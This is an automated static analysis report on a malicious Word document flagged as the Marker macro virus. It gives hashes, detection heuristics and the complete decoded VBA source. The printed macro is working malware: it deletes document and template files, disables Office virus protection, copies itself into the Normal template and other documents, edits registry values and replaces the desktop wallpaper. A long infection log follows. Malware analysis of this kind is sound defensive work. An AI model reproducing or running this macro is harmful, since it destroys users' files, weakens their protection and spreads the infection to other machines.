Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f36ce55ffbd6f119…

MALICIOUS

Office (OLE)

62.5 KB Created: 2007-12-12 14:41:00 Authoring application: Microsoft Macintosh Word First seen: 2015-09-17
MD5: 494bce5823dafcdcd13440287f747852 SHA-1: 0f64d11276e2c88ea08ad3260801c03ae70cf784 SHA-256: f36ce55ffbd6f11919ad17d129ae704457849fd36772dde61ffa2be7286035b2
218 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains VBA macros that attempt to disable macro protection and replicate their code to the Normal template, indicating a self-replication and persistence mechanism. The macro also attempts to tamper with virus protection settings. The presence of the 'Document_Open' macro and the replication behavior strongly suggest malicious intent, likely to ensure the macro runs on future document openings and potentially to spread.

Heuristics 6

  • ClamAV: Doc.Trojan.Marker-35 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-35
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Kill Options.DefaultFilePath(8) & "\*.dot"
Options.VirusProtection = False
Application.UserName = "JonMMx 2000"
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Const Marker = "<- this is a marker! by jonhehehe TheBest-versi212x"
Private Sub Document_Open()
Document_Close
  • Urgency / deadline lure low SE_URGENCY_LURE
    Document contains urgency or deadline language ('account will be terminated', 'action required within 24 hours', etc.) — useful context, but low-signal without other findings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.grbtv.com In document text (OLE body)
    • http://www.iec.chIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8916 bytes
SHA-256: 805c73615a4b5bfba0ba6b42c0e67dbf364dcc96494fd2f6f24104cba3963445
Detection
ClamAV: Doc.Trojan.Marker-13
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Seline, Where are you dear
Const Marker = "<- this is a marker! by jonhehehe TheBest-versi212x"
Private Sub Document_Open()
Document_Close
End Sub
Private Sub Document_Close()
Dim nmod As Object
Dim isd As String
Dim DS, NTS, DI, NTI As Boolean
Dim Jon, Users, LogData, LogFile As String
On Error Resume Next
AddIns.Unload True
Kill Options.DefaultFilePath(8) & "\*.doc"
Kill Options.DefaultFilePath(8) & "\*.dot"
Options.VirusProtection = False
Application.UserName = "JonMMx 2000"
Application.UserInitials = "MeMeX"
Application.UserAddress = "JonMMx2000@yahoo.com"
Application.EnableCancelKey = wdCancelDisabled
GoSub InsertIon
If (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", _
   "LogData in") = False) Then GoSub LoggingIn
If WeekDay(Now()) = 1 Then GoSub ShowMe
GoTo Finish
InsertIon:
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
DI = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NTI = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
If (DI Xor NTI) And (ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate) Then
 If DI Then
   NTS = NormalTemplate.Saved
   Jon = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
   For i = 1 To Len(Application.UserAddress)
    If (Mid(Application.UserAddress, i, 1) <> Chr(13)) Then
       If (Mid(Application.UserAddress, i, 1) <> Chr(10)) Then
          Users = Users & Mid(Application.UserAddress, i, 1)
       End If
    Else
       Users = Users & Chr(13) & " '"
    End If
   Next
   Jon = Jon & Chr(13) & _
         "' " & Format(Time, "hh:mm:sc AMPM-") & _
                Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
         "' " & Application.UserName & Chr(13) & _
         "' " & Users & Chr(13) & Chr(13) & " "
   nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
   nt.CodeModule.AddFromString Jon
   If NTS Then NormalTemplate.Save
 End If
 If NTI Then
    DS = ActiveDocument.Saved
    Jon = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
    ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
    ad.CodeModule.AddFromString Jon
    If DS Then ActiveDocument.Save
 End If
End If
Return
LoggingIn:
   System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogData in") = True
   GoSub ShowMe
Return
ShowMe:
Dim RootsyS As String
On Error Resume Next
 RootsyS = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "SystemRoot")
 Open RootsyS & "\Jon.html" For Output As #1
 Print #1, "<Html><head><title>Welcome to Destroyer of the last Manillenium JontheBEST</title></head><Body><body bgcolor = '#FFF212' >"
 Print #1, "<center><p align='center'><font color='#800000'size='25'><strong>a Poet For My Dear Love</strong></font></p>"
 Print #1, "<p align='center'><font color='#000000' size='6'><strong><a href='mailto:iamwaiting@yahoo.com'>Dear Iin</a></strong></font> </p>"
 Print #1, "<font normal></center>To the very best that happen in mylife<p>"
 Print #1, "<p>Long ago and in my mind, I can see your face lonely and lost in time "
 Print #1, "<p>You were gone since yester month But the memories, never would dissapear"
 Print #1, "<p>I think of you, I THINK OF YOU.<p>"
 Print #1, "<p>Yes it's true I can pretend. But the paint of blue, keep beat me till the end."
 Print #1, "<p>Yes it's hard to understand. Why you leaving me and all we dreaming on "
 Print #1, "<p>Dear Iin, I close my eyes and see your face.  That's all I have to do to be with you. "
 Print #1, "<p>Dear Iin, altough I can not touch your face.  I know what I can do to be with you "
 Print #1, "<p>Long ago so faraway. But the light of blue, still living with me today."
 Print #1, "<p>You were gone since yester month.  But the memories never would dissapear."
 Print #1, "<center><font color='#245505' size='6'><strong><p>Speed Hari</strong></font></center></Body></html>"
 Close #1
 System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\General", "Wallpaper") = RootsyS & "\Jon.html"
Return
Finish:
End Sub
'Logfile -->

' 06:14:2518:14:25 -Kamis, 22 Jul 1999
' JonMMx 2000
' jonthebest@hotbot.com


' 09:07:259:07:25 -Sabtu, 24 Jun 2017
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 12:13:3712:13:37 AM AM-Saturday, 14 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 09:55:459:55:45 AM AM-Wednesday, 25 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 04:05:474:05:47 AM AM-Thursday, 26 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 07:41:387:41:38 PM PM-Friday, 27 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 12:43:2212:43:22 PM PM-Monday, 30 Aug 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 09:02:559:02:55 -Sabtu, 28 Agust 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 02:16:1314:16:13 -Jumat, 3 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 04:17:374:17:37 AM AM-Saturday, 4 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 09:42:399:42:39 PM PM-Monday, 6 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 10:00:4210:00:42 PM PM-Wednesday, 8 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 04:19:334:19:33 PM PM-Thursday, 9 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 09:32:279:32:27 AM AM-Thursday, 16 Sep 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 01:23:111:23:11 PM PM-Wednesday, 6 Oct 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 12:56:212:56:02 PM PM-Friday, 8 Oct 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 11:37:611:37:06 AM AM-Saturday, 9 Oct 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 10:43:710:43:07 PM PM-Thursday, 14 Oct 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 05:30:25:30:02 PM PM-Wednesday, 10 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 10:17:510:17:05 AM AM-Tuesday, 16 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 06:17:146:17:14 PM PM-Monday, 15 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 07:32:467:32:46 PM PM-Thursday, 18 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 07:06:587:06:58 PM PM-Wednesday, 24 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 02:38:422:38:42 AM AM-Thursday, 25 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 08:59:48:59:04 PM PM-Thursday, 25 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 01:18:221:18:22 -Jumat, 26 Nop 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 07:51:287:51:28 PM PM-Monday, 29 Nov 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 10:58:510:58:05 -jeudi, 2 déc 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 02:11:114:11:01 -lundi, 6 déc 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 06:58:1918:58:19 -mardi, 7 déc 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 02:43:2714:43:27 -lundi, 13 déc 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 11:10:2511:10:25 -vendredi, 17 déc 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 11:47:3123:47:31 -lundi, 20 déc 1999
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 05:12:1917:12:19 -mercredi, 2 févr 2000
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 07:57:3707:57:37 -mercredi, 23 févr 2000
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 11:49:4311:49:43 -mardi, 25 avr 2000
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 11:27:5911:27:59 -mercredi, 26 juil 2000
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 11:04:2611:04:26  am-dimanche, 28 jan 2001
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 11:04:3211:04:32  am-mercredi, 9 mai 2001
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 05:11:2617:11:26  pm-mardi, 19 juin 2001
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 06:37:1018:37:10  pm-mercredi, 4 juil 2001
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 10:43:422:43:04  pm-jeudi, 5 mai 1904
' JonMMx 2000
' JonMMx2000@yahoo.com

 

' 12:33:112:33:01  pm-mardi, 29 avr 2003
' JonMMx 2000
' JonMMx2000@yahoo.com

 


' 12:11:2612:11:26  pm-jeudi, 22 mai 2003
' JonMMx 2000
' JonMMx2000@yahoo.com

 

' 03:52:5415:52:54  pm-jeudi, 29 jan 2004
' JonMMx 2000
' u-man
 'JonMMx2000@yahoo.com

 


' 06:18:5218:18:52 -maandag, 14 jun 2004
' JonMMx 2000
' RAB
 'JonMMx2000@yahoo.com

 


' 10:00:710:00:07 AM AM-Tuesday, 15 Jun 2004
' JonMMx 2000
' Roses are Blue
 'JonMMx2000@yahoo.com

 


' 05:04:717:04:07  PM-Wednesday, 14 Jul 2004
' JonMMx 2000
' Roses are Blue
 'JonMMx2000@yahoo.com

 


' 12:42:4000:42:40 -donderdag, 5 aug 2004
' JonMMx 2000
' RAB
 'JonMMx2000@yahoo.com

 


' 05:08:817:08:08  PM-woensdag, 6 Oct 2004
' JonMMx 2000
' Roses are Blue
 'JonMMx2000@yahoo.com

 

' 04:21:716:21:07 -mánudagur, 25 okt 2004
' JonMMx 2000
'  
 'JonMMx2000@yahoo.com

 


' 03:43:193:43:19 PM PM-Wednesday, 19 Apr 2006
' JonMMx 2000
'  
 'JonMMx2000@yahoo.com

Open this report in the interactive analyzer, or submit your own file for analysis.